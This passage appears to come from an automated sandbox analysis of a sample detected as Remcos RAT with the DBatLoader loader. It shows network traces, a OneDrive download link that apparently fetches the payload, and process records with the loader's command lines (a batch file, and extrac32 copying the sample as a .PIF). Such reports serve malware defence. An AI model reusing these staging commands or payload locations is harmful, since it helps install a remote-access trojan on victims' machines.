                                                                                      user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                      kernel32.dllSleep
                                                                                      oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                                      comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                                      comdlg32.dllGetSaveFileNameA, GetOpenFileNameA

                                                                                      Network Behavior

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Apr 24, 2024 10:58:58.625662088 CEST49710443192.168.2.613.107.137.11
                                                                                      Apr 24, 2024 10:58:58.625694990 CEST4434971013.107.137.11192.168.2.6
                                                                                      Apr 24, 2024 10:58:58.625865936 CEST49710443192.168.2.613.107.137.11
                                                                                      Apr 24, 2024 10:58:58.628118038 CEST49710443192.168.2.613.107.137.11
                                                                                      Apr 24, 2024 10:58:58.628143072 CEST4434971013.107.137.11192.168.2.6
                                                                                      Apr 24, 2024 10:58:58.628271103 CEST49710443192.168.2.613.107.137.11
                                                                                      Apr 24, 2024 10:58:58.825982094 CEST49711443192.168.2.613.107.137.11
                                                                                      Apr 24, 2024 10:58:58.826001883 CEST4434971113.107.137.11192.168.2.6
                                                                                      Apr 24, 2024 10:58:58.826096058 CEST49711443192.168.2.613.107.137.11
                                                                                      Apr 24, 2024 10:58:58.829837084 CEST49711443192.168.2.613.107.137.11
                                                                                      Apr 24, 2024 10:58:58.829855919 CEST4434971113.107.137.11192.168.2.6
                                                                                      Apr 24, 2024 10:58:59.375566959 CEST4434971113.107.137.11192.168.2.6
                                                                                      Apr 24, 2024 10:58:59.375649929 CEST49711443192.168.2.613.107.137.11
                                                                                      Apr 24, 2024 10:58:59.379081964 CEST49711443192.168.2.613.107.137.11
                                                                                      Apr 24, 2024 10:58:59.379090071 CEST4434971113.107.137.11192.168.2.6
                                                                                      Apr 24, 2024 10:58:59.379333973 CEST4434971113.107.137.11192.168.2.6
                                                                                      Apr 24, 2024 10:58:59.425055981 CEST49711443192.168.2.613.107.137.11
                                                                                      Apr 24, 2024 10:58:59.428112984 CEST49711443192.168.2.613.107.137.11
                                                                                      Apr 24, 2024 10:58:59.476109982 CEST4434971113.107.137.11192.168.2.6
                                                                                      Apr 24, 2024 10:58:59.910589933 CEST4434971113.107.137.11192.168.2.6
                                                                                      Apr 24, 2024 10:58:59.910662889 CEST4434971113.107.137.11192.168.2.6
                                                                                      Apr 24, 2024 10:58:59.910836935 CEST49711443192.168.2.613.107.137.11
                                                                                      Apr 24, 2024 10:58:59.912903070 CEST49711443192.168.2.613.107.137.11
                                                                                      Apr 24, 2024 10:58:59.912941933 CEST4434971113.107.137.11192.168.2.6
                                                                                      Apr 24, 2024 10:59:15.196784973 CEST49715443192.168.2.613.107.137.11
                                                                                      Apr 24, 2024 10:59:15.196818113 CEST4434971513.107.137.11192.168.2.6
                                                                                      Apr 24, 2024 10:59:15.196878910 CEST49715443192.168.2.613.107.137.11
                                                                                      Apr 24, 2024 10:59:15.197391987 CEST49715443192.168.2.613.107.137.11
                                                                                      Apr 24, 2024 10:59:15.197442055 CEST4434971513.107.137.11192.168.2.6
                                                                                      Apr 24, 2024 10:59:15.197484016 CEST49715443192.168.2.613.107.137.11
                                                                                      Apr 24, 2024 10:59:15.236804962 CEST49716443192.168.2.613.107.137.11
                                                                                      Apr 24, 2024 10:59:15.236838102 CEST4434971613.107.137.11192.168.2.6
                                                                                      Apr 24, 2024 10:59:15.236912012 CEST49716443192.168.2.613.107.137.11
                                                                                      Apr 24, 2024 10:59:15.239173889 CEST49716443192.168.2.613.107.137.11
                                                                                      Apr 24, 2024 10:59:15.239197016 CEST4434971613.107.137.11192.168.2.6
                                                                                      Apr 24, 2024 10:59:15.758847952 CEST4434971613.107.137.11192.168.2.6
                                                                                      Apr 24, 2024 10:59:15.758981943 CEST49716443192.168.2.613.107.137.11
                                                                                      Apr 24, 2024 10:59:15.765146971 CEST49716443192.168.2.613.107.137.11
                                                                                      Apr 24, 2024 10:59:15.765185118 CEST4434971613.107.137.11192.168.2.6
                                                                                      Apr 24, 2024 10:59:15.765412092 CEST4434971613.107.137.11192.168.2.6
                                                                                      Apr 24, 2024 10:59:15.809225082 CEST49716443192.168.2.613.107.137.11
                                                                                      Apr 24, 2024 10:59:15.856112957 CEST4434971613.107.137.11192.168.2.6
                                                                                      Apr 24, 2024 10:59:16.179497957 CEST4434971613.107.137.11192.168.2.6
                                                                                      Apr 24, 2024 10:59:16.179562092 CEST4434971613.107.137.11192.168.2.6
                                                                                      Apr 24, 2024 10:59:16.179687023 CEST49716443192.168.2.613.107.137.11
                                                                                      Apr 24, 2024 10:59:16.179877043 CEST49716443192.168.2.613.107.137.11
                                                                                      Apr 24, 2024 10:59:16.179914951 CEST4434971613.107.137.11192.168.2.6
                                                                                      Apr 24, 2024 10:59:16.179945946 CEST49716443192.168.2.613.107.137.11
                                                                                      Apr 24, 2024 10:59:16.179961920 CEST4434971613.107.137.11192.168.2.6
                                                                                      Apr 24, 2024 10:59:41.686218977 CEST49724443192.168.2.613.107.137.11
                                                                                      Apr 24, 2024 10:59:41.686271906 CEST4434972413.107.137.11192.168.2.6
                                                                                      Apr 24, 2024 10:59:41.686343908 CEST49724443192.168.2.613.107.137.11
                                                                                      Apr 24, 2024 10:59:41.686451912 CEST49724443192.168.2.613.107.137.11
                                                                                      Apr 24, 2024 10:59:41.686490059 CEST4434972413.107.137.11192.168.2.6
                                                                                      Apr 24, 2024 10:59:41.686544895 CEST49724443192.168.2.613.107.137.11
                                                                                      Apr 24, 2024 10:59:41.700259924 CEST49725443192.168.2.613.107.137.11
                                                                                      Apr 24, 2024 10:59:41.700313091 CEST4434972513.107.137.11192.168.2.6
                                                                                      Apr 24, 2024 10:59:41.700400114 CEST49725443192.168.2.613.107.137.11
                                                                                      Apr 24, 2024 10:59:41.701802015 CEST49725443192.168.2.613.107.137.11
                                                                                      Apr 24, 2024 10:59:41.701817989 CEST4434972513.107.137.11192.168.2.6
                                                                                      Apr 24, 2024 10:59:42.221200943 CEST4434972513.107.137.11192.168.2.6
                                                                                      Apr 24, 2024 10:59:42.221275091 CEST49725443192.168.2.613.107.137.11
                                                                                      Apr 24, 2024 10:59:42.223120928 CEST49725443192.168.2.613.107.137.11
                                                                                      Apr 24, 2024 10:59:42.223129034 CEST4434972513.107.137.11192.168.2.6
                                                                                      Apr 24, 2024 10:59:42.223342896 CEST4434972513.107.137.11192.168.2.6
                                                                                      Apr 24, 2024 10:59:42.265532017 CEST49725443192.168.2.613.107.137.11
                                                                                      Apr 24, 2024 10:59:42.280253887 CEST49725443192.168.2.613.107.137.11
                                                                                      Apr 24, 2024 10:59:42.328108072 CEST4434972513.107.137.11192.168.2.6
                                                                                      Apr 24, 2024 10:59:42.724077940 CEST4434972513.107.137.11192.168.2.6
                                                                                      Apr 24, 2024 10:59:42.724164009 CEST4434972513.107.137.11192.168.2.6
                                                                                      Apr 24, 2024 10:59:42.724245071 CEST49725443192.168.2.613.107.137.11
                                                                                      Apr 24, 2024 10:59:42.724404097 CEST49725443192.168.2.613.107.137.11
                                                                                      Apr 24, 2024 10:59:42.724416018 CEST4434972513.107.137.11192.168.2.6
                                                                                      Apr 24, 2024 10:59:42.724431038 CEST49725443192.168.2.613.107.137.11
                                                                                      Apr 24, 2024 10:59:42.724437952 CEST4434972513.107.137.11192.168.2.6

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Apr 24, 2024 10:58:58.462943077 CEST5883053192.168.2.61.1.1.1
                                                                                      Apr 24, 2024 10:58:58.670382977 CEST6524353192.168.2.61.1.1.1
                                                                                      Apr 24, 2024 10:58:59.917632103 CEST5922453192.168.2.61.1.1.1
                                                                                      Apr 24, 2024 10:59:15.036705971 CEST6253853192.168.2.61.1.1.1

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Apr 24, 2024 10:58:58.462943077 CEST192.168.2.61.1.1.10x3b5cStandard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                      Apr 24, 2024 10:58:58.670382977 CEST192.168.2.61.1.1.10x4348Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                      Apr 24, 2024 10:58:59.917632103 CEST192.168.2.61.1.1.10xc9f6Standard query (0)xirfeg.sn.files.1drv.comA (IP address)IN (0x0001)false
                                                                                      Apr 24, 2024 10:59:15.036705971 CEST192.168.2.61.1.1.10xe549Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Apr 24, 2024 10:58:58.619640112 CEST1.1.1.1192.168.2.60x3b5cNo error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 24, 2024 10:58:58.619640112 CEST1.1.1.1192.168.2.60x3b5cNo error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 24, 2024 10:58:58.619640112 CEST1.1.1.1192.168.2.60x3b5cNo error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 24, 2024 10:58:58.619640112 CEST1.1.1.1192.168.2.60x3b5cNo error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                      Apr 24, 2024 10:58:58.619640112 CEST1.1.1.1192.168.2.60x3b5cNo error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                      Apr 24, 2024 10:58:58.824547052 CEST1.1.1.1192.168.2.60x4348No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 24, 2024 10:58:58.824547052 CEST1.1.1.1192.168.2.60x4348No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 24, 2024 10:58:58.824547052 CEST1.1.1.1192.168.2.60x4348No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 24, 2024 10:58:58.824547052 CEST1.1.1.1192.168.2.60x4348No error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                      Apr 24, 2024 10:58:58.824547052 CEST1.1.1.1192.168.2.60x4348No error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                      Apr 24, 2024 10:59:00.148185968 CEST1.1.1.1192.168.2.60xc9f6No error (0)xirfeg.sn.files.1drv.comsn-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 24, 2024 10:59:00.148185968 CEST1.1.1.1192.168.2.60xc9f6No error (0)sn-files.fe.1drv.comodc-sn-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 24, 2024 10:59:15.190587997 CEST1.1.1.1192.168.2.60xe549No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 24, 2024 10:59:15.190587997 CEST1.1.1.1192.168.2.60xe549No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 24, 2024 10:59:15.190587997 CEST1.1.1.1192.168.2.60xe549No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 24, 2024 10:59:15.190587997 CEST1.1.1.1192.168.2.60xe549No error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                      Apr 24, 2024 10:59:15.190587997 CEST1.1.1.1192.168.2.60xe549No error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false

                                                                                      HTTP Request Dependency Graph

                                                                                      • onedrive.live.com

                                                                                      HTTPS Proxied Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.64971113.107.137.114432056C:\Users\user\Desktop\udVh4Ist4Z.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-04-24 08:58:59 UTC213OUTGET /download?resid=9ADCDEDB531E38FE%21107&authkey=!AIYYWqDY10e5-pU HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Accept: */*
                                                                                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                      Host: onedrive.live.com
                                                                                      2024-04-24 08:58:59 UTC1177INHTTP/1.1 302 Found
                                                                                      Cache-Control: no-cache, no-store
                                                                                      Pragma: no-cache
                                                                                      Content-Type: text/html
                                                                                      Expires: -1
                                                                                      Location: https://xirfeg.sn.files.1drv.com/y4mmJkpN2-URpDPce1turH6bNoPZHs8qohGTBPPgUSqUu1WeGjpTknCmr6n8UWtLOerQ4av3Xm6HTixtKAThH9G-4anG68e8wV1Qrk2RPdiHNecy8RCqK5uh_yuJFSUBIFok8DGdj11PTrYBnhL5XYXHHBJ2Ngcz8FsPL0nwv83oiQrBe-qE2QgkGb51WouA06k6abex4k4_hxa5CtXJoeKmw/255_Xjfxsfmnmga?download&psid=1
                                                                                      Set-Cookie: E=P:ZC32xzxk3Ig=:gf72egvBchaFkW4GhoESqrq6fufu6UGXYYXzzAfBhi0=:F; domain=.live.com; path=/
                                                                                      Set-Cookie: xid=e1049b89-a0de-4bad-81a0-8a913e713135&&ODSP-ODWEB-ODCF&152; domain=.live.com; path=/
                                                                                      Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                      Set-Cookie: LD=; domain=.live.com; expires=Wed, 24-Apr-2024 07:18:59 GMT; path=/
                                                                                      Set-Cookie: wla42=; domain=live.com; expires=Wed, 01-May-2024 08:58:59 GMT; path=/
                                                                                      X-Content-Type-Options: nosniff
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-MSNServer: 57d8d6c5b8-msl47
                                                                                      X-ODWebServer: namsouthce375367-odwebpl
                                                                                      X-Cache: CONFIG_NOCACHE
                                                                                      X-MSEdge-Ref: Ref A: 87361616C9914CDDA955E91C7278DD3A Ref B: BY3EDGE0311 Ref C: 2024-04-24T08:58:59Z
                                                                                      Date: Wed, 24 Apr 2024 08:58:59 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.64971613.107.137.114434040C:\Users\Public\Libraries\Xjfxsfmn.PIF
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-04-24 08:59:15 UTC213OUTGET /download?resid=9ADCDEDB531E38FE%21107&authkey=!AIYYWqDY10e5-pU HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Accept: */*
                                                                                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                      Host: onedrive.live.com
                                                                                      2024-04-24 08:59:16 UTC1177INHTTP/1.1 302 Found
                                                                                      Cache-Control: no-cache, no-store
                                                                                      Pragma: no-cache
                                                                                      Content-Type: text/html
                                                                                      Expires: -1
                                                                                      Location: https://xirfeg.sn.files.1drv.com/y4mQLd7Jb4tXEApwTb1qUvLYu4AYaX9rqayqbrqvAn-5-ThXvkZfJF26xlkeR3Ny-gJc1zykBmX5rYj9txW9R3kIzHF6dxV83l5heEa4PLxxwQWqeMm0OQWEc1f7icdv2kfJ7mTF-McvtGgF2w5lljaYU3ZMiQUKoUJVCed3J7leekUiF37s8NoidzJOtwh3TH73PJjGfpo7KC4z0jzjn5QlQ/255_Xjfxsfmnmga?download&psid=1
                                                                                      Set-Cookie: E=P:+HS70Txk3Ig=:DC3pJ6XrAb4XDrltQ5gluoG7MQWNiMcA6YdrWzAUw+Y=:F; domain=.live.com; path=/
                                                                                      Set-Cookie: xid=fa764b74-aa05-4064-bbf7-15e9e247033f&&ODSP-ODWEB-ODCF&152; domain=.live.com; path=/
                                                                                      Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                      Set-Cookie: LD=; domain=.live.com; expires=Wed, 24-Apr-2024 07:19:15 GMT; path=/
                                                                                      Set-Cookie: wla42=; domain=live.com; expires=Wed, 01-May-2024 08:59:16 GMT; path=/
                                                                                      X-Content-Type-Options: nosniff
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-MSNServer: 57d8d6c5b8-2lbqt
                                                                                      X-ODWebServer: namsouthce375367-odwebpl
                                                                                      X-Cache: CONFIG_NOCACHE
                                                                                      X-MSEdge-Ref: Ref A: 4AF7ECC4517044E19B7D8DDF105D1922 Ref B: BY3EDGE0305 Ref C: 2024-04-24T08:59:15Z
                                                                                      Date: Wed, 24 Apr 2024 08:59:15 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.64972513.107.137.114433708C:\Users\Public\Libraries\Xjfxsfmn.PIF
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-04-24 08:59:42 UTC213OUTGET /download?resid=9ADCDEDB531E38FE%21107&authkey=!AIYYWqDY10e5-pU HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Accept: */*
                                                                                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                      Host: onedrive.live.com
                                                                                      2024-04-24 08:59:42 UTC1177INHTTP/1.1 302 Found
                                                                                      Cache-Control: no-cache, no-store
                                                                                      Pragma: no-cache
                                                                                      Content-Type: text/html
                                                                                      Expires: -1
                                                                                      Location: https://xirfeg.sn.files.1drv.com/y4mA7VtsLBctMjPvNeW-nBjYzK-kMyIJaIZdFZhf0ai66qWNCa5Jqdc_iM5uVKa3zxnfUIKkPKwoVek0WzbG1sBfXbnn7j6CE35llpTYR8jWullRvburWFPOzYWZmPWfEh7HK5zgmIWLaeM4IWI8-2P2jGVB1DgJM_BOIsrxpI1008nTdqqWDEdXlS1rwrx6uAnbjPKKpjIHb5KX0KRzvJ5Nw/255_Xjfxsfmnmga?download&psid=1
                                                                                      Set-Cookie: E=P:YIGB4Txk3Ig=:cyj/OW5gsd9dnMF8QloDqdnQ5k5Bw8piqaCgPeNebuo=:F; domain=.live.com; path=/
                                                                                      Set-Cookie: xid=350d62be-3739-4ee0-98bc-64096d1675e5&&ODSP-ODWEB-ODCF&152; domain=.live.com; path=/
                                                                                      Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                      Set-Cookie: LD=; domain=.live.com; expires=Wed, 24-Apr-2024 07:19:42 GMT; path=/
                                                                                      Set-Cookie: wla42=; domain=live.com; expires=Wed, 01-May-2024 08:59:42 GMT; path=/
                                                                                      X-Content-Type-Options: nosniff
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-MSNServer: 58656754b6-fnrbf
                                                                                      X-ODWebServer: namsouthce155880-odwebpl
                                                                                      X-Cache: CONFIG_NOCACHE
                                                                                      X-MSEdge-Ref: Ref A: 2B2F2BFB45E54D2DBC284776936ED645 Ref B: BY3EDGE0414 Ref C: 2024-04-24T08:59:42Z
                                                                                      Date: Wed, 24 Apr 2024 08:59:41 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 0


                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      Click to dive into process behavior distribution

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Target ID:0
                                                                                      Start time:10:58:56
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Users\user\Desktop\udVh4Ist4Z.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\udVh4Ist4Z.exe"
                                                                                      Imagebase:0x400000
                                                                                      File size:1'639'424 bytes
                                                                                      MD5 hash:2CC30D206669699E58870623365FEF82
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:Borland Delphi
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000003.2139310911.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000003.2139310911.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000003.2139310911.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.2148072025.0000000002C60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2163236530.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2163236530.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2163236530.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:3
                                                                                      Start time:10:59:01
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\XjfxsfmnO.bat" "
                                                                                      Imagebase:0x1c0000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:4
                                                                                      Start time:10:59:01
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff66e660000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:5
                                                                                      Start time:10:59:01
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\udVh4Ist4Z.exe C:\\Users\\Public\\Libraries\\Xjfxsfmn.PIF
                                                                                      Imagebase:0xd00000
                                                                                      File size:29'184 bytes
                                                                                      MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:6
                                                                                      Start time:10:59:01
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Users\Public\Libraries\nmfsxfjX.pif
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\Public\Libraries\nmfsxfjX.pif
                                                                                      Imagebase:0x400000
                                                                                      File size:68'096 bytes
                                                                                      MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000001.2139650597.0000000000490000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000001.2139650597.0000000000490000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000001.2139650597.0000000000490000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                      Antivirus matches:
                                                                                      • Detection: 3%, ReversingLabs
                                                                                      • Detection: 0%, Virustotal, Browse
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:7
                                                                                      Start time:10:59:02
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\ProgramData\Remcos\remcos.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\ProgramData\Remcos\remcos.exe"
                                                                                      Imagebase:0x400000
                                                                                      File size:68'096 bytes
                                                                                      MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
